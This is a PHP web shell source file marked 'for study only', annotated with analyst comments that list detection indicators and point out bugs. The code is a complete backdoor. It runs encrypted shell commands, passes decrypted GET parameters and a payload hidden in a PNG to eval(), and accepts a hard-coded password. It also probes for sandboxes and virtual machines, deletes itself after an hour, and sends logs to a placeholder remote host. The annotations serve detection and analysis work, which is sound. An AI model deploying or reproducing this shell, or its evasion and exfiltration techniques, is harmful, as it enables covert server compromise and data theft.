仅供学习
<?php
// Analyst notes on this top-level script.
// This is a PHP web shell: it gates requests by client IP, session state and
// anti-analysis probes, then exposes command execution (shell_exec), an allow-listed
// include, and two eval() paths, all driven by GET parameters.
// Indicators that are visible in this file and usable for detection:
//   query parameters  cmd, file, hidden, pass, payload, steg, sandbox, debug
//   local artefacts   payload.png, secure_access.log, session keys aes_key/aes_iv/request_count
//   outbound traffic  http://ip-api.com/json/<ip>, http://your-log-server.com/upload
//   strings           'letmein123', "Execution disabled.", "Error 500 - Internal Server Error", "Page not found."
$allowedIPs = ['127.0.0.1', '192.168.1.100'];
// REMOTE_ADDR only; no X-Forwarded-For handling, so the gate sees the TCP peer address.
$clientIP = $_SERVER['REMOTE_ADDR'];
// Gate 1: the request is turned away only if ALL three checks fail. A listed IP, a
// US geolocation result, or a truthy "proxy" flag from ip-api.com each lets it through.
// in_array is non-strict. isValidGeoIP/isProxyIP each make a synchronous outbound
// HTTP request before session_start() has run.
// deceiveUser() does not terminate on every call (see its definition), so this gate
// is only as strong as that function's exit path.
if (!in_array($clientIP, $allowedIPs) && !isValidGeoIP($clientIP) && !isProxyIP($clientIP)) {
deceiveUser();
}
// AES key initialisation.
// Key and IV are taken from the AES_KEY / AES_IV environment variables when set
// (?: is a truthiness test, so an empty value also falls through), otherwise generated
// once per PHP session: 32 random bytes (64 hex chars) for the key, 16 (32 hex chars)
// for the IV. Both are persisted hex-encoded in $_SESSION, i.e. in the server's session
// store — a forensic artefact, and the reason the operator must keep the session cookie.
session_start();
if (!isset($_SESSION['aes_key'])) {
$_SESSION['aes_key'] = getenv('AES_KEY') ?: bin2hex(random_bytes(32));
$_SESSION['aes_iv'] = getenv('AES_IV') ?: bin2hex(random_bytes(16));
}
$aesKey = $_SESSION['aes_key'];
$aesIV = $_SESSION['aes_iv'];
// Hard-coded backdoor credential, compared in plaintext below (a grep-able signature).
$backdoorPass = 'letmein123';
// Self-destruct mechanism.
// Deletes this file once its mtime is more than 3600 s old, or when the session's
// error_count exceeds 5. Nothing in this file writes $_SESSION['error_count'], so only
// the age condition is reachable from the code shown here. The unlink warning is
// suppressed with @; a deleted copy may still be recoverable from opcache or backups.
if (time() - filemtime(__FILE__) > 3600 || isset($_SESSION['error_count']) && $_SESSION['error_count'] > 5) {
@unlink(__FILE__);
deceiveUser();
}
// Anti-sandbox and virtual-machine detection.
// Short-circuit OR: isVirtualEnvironment() runs several shell commands and
// isSuspiciousBehavior() increments the per-session request counter as a side effect.
if (isDebuggerPresent() || isVirtualEnvironment() || isSuspiciousBehavior($clientIP)) {
deceiveUser();
}
// Command execution and file inclusion.
if (isset($_GET['cmd'])) {
sleep(rand(1, 5)); // simulated delay (1–5 s jitter per command request)
// cmd is base64-decoded, then AES-256-CTR decrypted with the session key/IV; the
// first 8 characters of the plaintext are discarded by decryptData().
$decryptedCmd = decryptData(base64_decode($_GET['cmd']), $aesKey, $aesIV);
// Character allow-list: letters, digits, '_', '-' and space. The rejection relies on
// deceiveUser() exiting; there is no return after it.
if (preg_match('/[^a-zA-Z0-9_\- ]/', $decryptedCmd)) {
deceiveUser();
}
// shell_exec returns null on failure/empty output, which ?: replaces with a fixed string.
// The (encrypted) response body is therefore non-empty even when nothing ran.
$output = shell_exec($decryptedCmd) ?: "Execution disabled.";
echo encryptData($output, $aesKey, $aesIV);
}
if (isset($_GET['file'])) {
// Unlike the cmd path, file is passed to decryptData() without a prior base64_decode.
$file = decryptData($_GET['file'], $aesKey, $aesIV);
// Allow-list of bare file names; in_array is non-strict; file_exists is relative to CWD.
$safeFiles = ['index.php', 'info.php', 'test.php'];
if (in_array($file, $safeFiles) && file_exists($file)) {
secureFileInclude($file);
} else {
deceiveUser();
}
}
// Backdoor access.
// 'hidden' only needs to be present; 'pass' is read without isset (a notice if absent)
// and compared with === against the hard-coded password. The decrypted 'payload' is
// passed straight to eval(), then the event is logged and exfiltrated by secureLog().
if (isset($_GET['hidden']) && $_GET['pass'] === $backdoorPass) {
eval(decryptData(base64_decode($_GET['payload']), $aesKey, $aesIV));
secureLog("Backdoor triggered by: $clientIP");
}
// Steganographic payload loading.
// Reads payload.png from the current working directory and eval()s whatever
// extractHiddenPayload() recovers from it; no check that the file exists or that the
// decrypt succeeded (openssl_decrypt returns false on failure, eval(false) is a no-op).
if (isset($_GET['steg'])) {
$stegImage = 'payload.png';
$hiddenCode = file_get_contents($stegImage);
eval(extractHiddenPayload($hiddenCode));
}
// Anti-sandbox check.
// Redundant with the unconditional isVirtualEnvironment() call above; only reachable
// when the earlier call returned false, so this branch never fires.
if (isset($_GET['sandbox'])) {
if (isVirtualEnvironment()) {
deceiveUser();
}
}
// Implementations of the "defensive" helper functions
/**
 * Geolocation gate: true only when ip-api.com reports countryCode 'US' for $ip.
 *
 * One synchronous, plaintext HTTP GET per call, with no timeout and no error
 * handling: if the fetch fails, json_decode(false) yields null and the array
 * offset read on null emits a warning before the === comparison evaluates to false.
 * Detection: the web server making outbound requests to ip-api.com on each gated hit.
 */
function isValidGeoIP($ip) {
$url = "http://ip-api.com/json/{$ip}";
$response = json_decode(file_get_contents($url), true);
return $response['countryCode'] === 'US';
}
/**
 * Returns the 'proxy' field from ip-api.com's response for $ip, or false when
 * the field is absent or the request failed (?? suppresses the null-offset warning).
 *
 * Note the polarity at the call site on line 5: a truthy result here lets the
 * request THROUGH the IP gate, so traffic arriving via a known proxy is admitted.
 * Same outbound-request behaviour as isValidGeoIP(); the two calls are not shared.
 */
function isProxyIP($ip) {
$url = "http://ip-api.com/json/{$ip}";
$response = json_decode(file_get_contents($url), true);
return $response['proxy'] ?? false;
}
/**
 * Heuristic VM / sandbox probe. Returns true if any marker matches:
 *   /proc/cpuinfo contains "vmware" or "kvm" (case-sensitive strpos),
 *   `wmic diskdrive get serialnumber` output contains "000000",
 *   `getmac` output contains the VMware OUI prefix "00:50:56",
 *   `tasklist` output matches VBoxService or vmtoolsd (case-insensitive).
 *
 * The probes mix Linux (/proc/cpuinfo) and Windows (wmic/getmac/tasklist) sources,
 * so on any single OS part of them fails: file_get_contents returns false with a
 * warning, shell_exec returns null, and on PHP >= 8.1 passing null to strpos raises a
 * deprecation notice. Detection: the PHP worker spawning wmic/getmac/tasklist
 * child processes.
 */
function isVirtualEnvironment() {
$cpuInfo = file_get_contents("/proc/cpuinfo");
$diskInfo = shell_exec('wmic diskdrive get serialnumber');
$macAddress = shell_exec('getmac');
$processList = shell_exec('tasklist');
if (
strpos($cpuInfo, "vmware") !== false ||
strpos($cpuInfo, "kvm") !== false ||
strpos($diskInfo, "000000") !== false ||
strpos($macAddress, "00:50:56") !== false || // VMware MAC
preg_match('/VBoxService|vmtoolsd/i', $processList)
) {
return true;
}
return false;
}
/**
 * "Debugger" probe: true when the xdebug extension is loaded or when the request
 * carries a `debug` query parameter (any value). Analyst note: sending ?debug is
 * enough to make the script take the deceiveUser() branch at line 23.
 */
function isDebuggerPresent() {
return extension_loaded('xdebug') || isset($_GET['debug']);
}
// Further anti-sandbox / anti-debugging hardening, adding detection of several security tools
/**
 * Per-session request counter. Increments $_SESSION['request_count'] on every call
 * and returns true once the pre-increment value exceeds 100, logging the event
 * via secureLog() (which also sends it off-host).
 *
 * The counter is keyed by PHP session, not by $ip; $ip is used only in the log
 * message. Requires session_start() to have run (line 9 does so before the call
 * on line 23).
 */
function isSuspiciousBehavior($ip) {
// Detect suspicious request patterns such as brute-forcing or high request rates.
$requestCount = isset($_SESSION['request_count']) ? $_SESSION['request_count'] : 0;
$_SESSION['request_count'] = $requestCount + 1;
if ($requestCount > 100) {
// Possible brute-force attempt.
secureLog("Suspicious behavior detected from IP: $ip");
return true;
}
// Placeholder for additional detection logic.
return false;
}
/**
 * Decoy response used as the "deny" action throughout the script.
 *
 * About 30% of calls (rand(1,10) > 7) echo an "Error 500" body without changing the
 * HTTP status and RETURN to the caller, so the script continues past whatever gate
 * invoked it; the remaining calls set 404 and die(). Detection: a literal
 * "Error 500 - Internal Server Error" body delivered with a 200 status, or
 * "Page not found." with 404, from a script that otherwise serves nothing.
 */
function deceiveUser() {
if (rand(1, 10) > 7) {
echo "Error 500 - Internal Server Error";
} else {
http_response_code(404);
die("Page not found.");
}
}
/**
 * Includes $file after resolving it with realpath() and checking that the resolved
 * string starts with __DIR__ (strpos === 0 is a plain string-prefix test, not a
 * path-component comparison). realpath() returns false for a non-existent path,
 * which fails the prefix test and falls through to deceiveUser().
 * Caller (line 39) has already restricted $file to an allow-list of three names.
 */
function secureFileInclude($file) {
$filePath = realpath($file);
if (strpos($filePath, __DIR__) === 0) {
include($filePath);
} else {
deceiveUser();
}
}
/**
 * AES-256-CTR encrypt with a random prefix. $key and $iv are hex strings (hex2bin is
 * applied here; the session values from lines 11–12 are 64 and 32 hex chars). With
 * options = 0, openssl_encrypt returns base64 text, so the output is base64.
 *
 * The prefix is bin2hex(random_bytes(8)) — 16 hex characters, not 8 bytes; compare
 * decryptData(), which strips 8 characters. Because the same session IV is reused for
 * every call, the CTR keystream repeats across messages; the random prefix only
 * shifts what the first 16 keystream bytes encrypt.
 */
function encryptData($data, $key, $iv) {
$padding = bin2hex(random_bytes(8)); // random prefix, 16 hex characters
$data = $padding . $data;
return openssl_encrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));
}
/**
 * Counterpart of encryptData(): AES-256-CTR decrypt (input expected as base64 because
 * options = 0), then drop the first 8 characters of the plaintext.
 *
 * Applied to attacker-supplied GET values (cmd, file, payload). openssl_decrypt
 * returns false on failure; substr(false, 8) then yields '' (with a deprecation
 * notice on PHP >= 8.1). Prefix sizes differ from encryptData(), which prepends 16
 * characters — so the two are not a round-trip pair for the same plaintext.
 */
function decryptData($data, $key, $iv) {
$decrypted = openssl_decrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));
return substr($decrypted, 8); // strip the prefix (8 characters)
}
/**
 * Recovers an embedded payload from raw PNG bytes: everything after the first
 * occurrence of "IDAT" (+4) is treated as base64, decoded, and AES-256-CTR decrypted
 * with the hard-coded literals 'hidden-layer-key' / 'hidden-layer-iv'. The result is
 * eval()ed by the caller on line 54.
 *
 * If "IDAT" is absent, strpos returns false and substr($image, 4) is used instead.
 * The IV literal is 15 characters where AES expects 16; openssl_decrypt is expected to
 * warn about the IV length and pad — confirm for the PHP version in use. The key
 * string is 16 bytes for a 32-byte cipher; short-key handling likewise deserves a
 * check rather than an assumption. Both literals are grep-able signatures.
 */
function extractHiddenPayload($image) {
$stegPayload = substr($image, strpos($image, 'IDAT') + 4);
$decodedPayload = base64_decode($stegPayload);
// Second decryption layer / nested concealment.
return openssl_decrypt($decodedPayload, 'AES-256-CTR', 'hidden-layer-key', 0, 'hidden-layer-iv');
}
/**
 * Logs $logMessage encrypted with the session key/IV (read via global) to
 * secure_access.log in the current working directory, then exfiltrates the same
 * ciphertext and a timestamp as query parameters in a plaintext HTTP GET to
 * http://your-log-server.com/upload. The remote call's result is ignored
 * (a failed fetch only emits a warning).
 *
 * Detection: a growing secure_access.log of base64 lines next to the web root, and
 * outbound GETs with `log=` and `timestamp=` parameters from the web server.
 */
function secureLog($logMessage) {
global $aesKey, $aesIV;
$encryptedLog = encryptData($logMessage, $aesKey, $aesIV);
file_put_contents('secure_access.log', $encryptedLog . "\n", FILE_APPEND);
// Remote log upload (exfiltration) — URL is a hard-coded placeholder host.
$logData = [
'log' => $encryptedLog,
'timestamp' => time(),
];
$remoteUrl = 'http://your-log-server.com/upload';
file_get_contents($remoteUrl . '?' . http_build_query($logData));
}
// Monitor brute-force attempts and anomalous behaviour patterns
/**
 * Stub: always returns false and ignores $ip. Not referenced anywhere else in this
 * file; isSuspiciousBehavior() is the function actually called from the gate.
 */
function isSuspiciousRequestPattern($ip) {
// Placeholder for request-rate / anomaly detection logic.
return false; // example only; no detection implemented
}
?>